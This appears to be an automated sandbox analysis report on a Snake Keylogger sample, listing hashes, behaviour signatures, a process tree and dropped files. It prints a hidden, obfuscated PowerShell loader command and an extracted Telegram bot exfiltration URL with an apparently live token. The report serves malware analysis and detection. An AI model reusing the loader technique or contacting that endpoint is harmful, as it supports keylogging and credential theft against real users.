Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
15-11-2024 02:31
Static task
static1
Behavioral task
behavioral1
Sample
4dd290b26a372dbce70e2804f4cb514d8d2ad621d6844acb9933d72efdcb893f.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
4dd290b26a372dbce70e2804f4cb514d8d2ad621d6844acb9933d72efdcb893f.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Formaalsbestemmelsens/Omraadenummers.ps1
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Formaalsbestemmelsens/Omraadenummers.ps1
Resource
win10v2004-20241007-en
General
-
Target
4dd290b26a372dbce70e2804f4cb514d8d2ad621d6844acb9933d72efdcb893f.exe
-
Size
685KB
-
MD5
2032c338e04d0b5a60eef3f7b7328891
-
SHA1
352126118e6c6ce3c595c6ac589a70b96cdcc322
-
SHA256
4dd290b26a372dbce70e2804f4cb514d8d2ad621d6844acb9933d72efdcb893f
-
SHA512
7aea68700ce219007212c465be4dd752e04f16584cfdfdcb0bf56f99b357f731934e00ae0efc5c5dab29ad5a5735e280ac37a0c425c2a78009875195aacb2696
-
SSDEEP
12288:G0mnA1zA7zDwONNpP0cldbpH3RfKNmucxdiUWIJiGar9t3DSDb4N5:uA1zALdNpPRllR3NUmuq016Bg3ewH
Malware Config
Extracted
snakekeylogger
https://api.telegram.org/bot7610532139:AAFiI3HHwFD6pWziyPu3lWJbRKPQtz0nD2c/sendMessage?chat_id=6680692809
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 2 IoCs
resource yara_rule behavioral2/memory/2748-66-0x0000000000C20000-0x0000000000C46000-memory.dmp family_snakekeylogger behavioral2/memory/2748-65-0x0000000000C20000-0x0000000001E74000-memory.dmp family_snakekeylogger -
Snakekeylogger family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 3384 powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
Blocklisted process makes network request 4 IoCs
flow pid Process 18 2748 msiexec.exe 24 2748 msiexec.exe 29 2748 msiexec.exe 40 2748 msiexec.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 23 checkip.dyndns.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 2748 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 3384 powershell.exe 2748 msiexec.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\resources\0409\propangas.lem 4dd290b26a372dbce70e2804f4cb514d8d2ad621d6844acb9933d72efdcb893f.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4dd290b26a372dbce70e2804f4cb514d8d2ad621d6844acb9933d72efdcb893f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 3384 powershell.exe 3384 powershell.exe 3384 powershell.exe 3384 powershell.exe 3384 powershell.exe 3384 powershell.exe 3384 powershell.exe 3384 powershell.exe 3384 powershell.exe 2748 msiexec.exe 2748 msiexec.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 3384 powershell.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 3384 powershell.exe Token: SeIncreaseQuotaPrivilege 3384 powershell.exe Token: SeSecurityPrivilege 3384 powershell.exe Token: SeTakeOwnershipPrivilege 3384 powershell.exe Token: SeLoadDriverPrivilege 3384 powershell.exe Token: SeSystemProfilePrivilege 3384 powershell.exe Token: SeSystemtimePrivilege 3384 powershell.exe Token: SeProfSingleProcessPrivilege 3384 powershell.exe Token: SeIncBasePriorityPrivilege 3384 powershell.exe Token: SeCreatePagefilePrivilege 3384 powershell.exe Token: SeBackupPrivilege 3384 powershell.exe Token: SeRestorePrivilege 3384 powershell.exe Token: SeShutdownPrivilege 3384 powershell.exe Token: SeDebugPrivilege 3384 powershell.exe Token: SeSystemEnvironmentPrivilege 3384 powershell.exe Token: SeRemoteShutdownPrivilege 3384 powershell.exe Token: SeUndockPrivilege 3384 powershell.exe Token: SeManageVolumePrivilege 3384 powershell.exe Token: 33 3384 powershell.exe Token: 34 3384 powershell.exe Token: 35 3384 powershell.exe Token: 36 3384 powershell.exe Token: SeDebugPrivilege 2748 msiexec.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 3020 wrote to memory of 3384 3020 4dd290b26a372dbce70e2804f4cb514d8d2ad621d6844acb9933d72efdcb893f.exe 84 PID 3020 wrote to memory of 3384 3020 4dd290b26a372dbce70e2804f4cb514d8d2ad621d6844acb9933d72efdcb893f.exe 84 PID 3020 wrote to memory of 3384 3020 4dd290b26a372dbce70e2804f4cb514d8d2ad621d6844acb9933d72efdcb893f.exe 84 PID 3384 wrote to memory of 2748 3384 powershell.exe 97 PID 3384 wrote to memory of 2748 3384 powershell.exe 97 PID 3384 wrote to memory of 2748 3384 powershell.exe 97 PID 3384 wrote to memory of 2748 3384 powershell.exe 97 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\4dd290b26a372dbce70e2804f4cb514d8d2ad621d6844acb9933d72efdcb893f.exe"C:\Users\Admin\AppData\Local\Temp\4dd290b26a372dbce70e2804f4cb514d8d2ad621d6844acb9933d72efdcb893f.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3020 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Fragmentary=Get-Content -Raw 'C:\Users\Admin\AppData\Local\Nightingalize\intubation\Pjattehoveder\Formaalsbestemmelsens\Omraadenummers.Ter';$Spaniolens=$Fragmentary.SubString(53801,3);.$Spaniolens($Fragmentary)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3384 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2748
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Nightingalize\intubation\Pjattehoveder\Formaalsbestemmelsens\Leafmold.Hor
Filesize329KB
MD535eb2a7e04f8669bc2a522e167e68a20
SHA1fdc865ea7f484cef5cbbc3fcdc9e2d2b01d8ce7d
SHA25620d8da06af2039c3c22a0743d60768300fd7d594d4fd2f94b8dc6d4d3fba316b
SHA512882d4df658d2629ea477dbfb0dffaf40959952972433d0f466cb3737310ae811c20043f8683f556a228e4e4cdf22b2a162fe6cd3611a02990b33de20e0d0b0d8
-
C:\Users\Admin\AppData\Local\Nightingalize\intubation\Pjattehoveder\Formaalsbestemmelsens\Omraadenummers.Ter
Filesize52KB
MD5d6f8f522a812d7fe69126e347b3d9ca2
SHA13b2f8aa331cb4b435dd736b9ae1ed8ee6a5f1a28
SHA256224fc25fabc123f64dcd7b8343ccdcf3398b0735c9c4604c6cdc6e2f4e270721
SHA5127ec46b8c274c1a86e04ec72fb34c6081a5f47c6e1ddb5aeb2a69ea3fd70b7ee01c69842310bc11a84f6d1abb4cda1b13c0fdd4c9a47fda09ca7d819f2c6e278c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82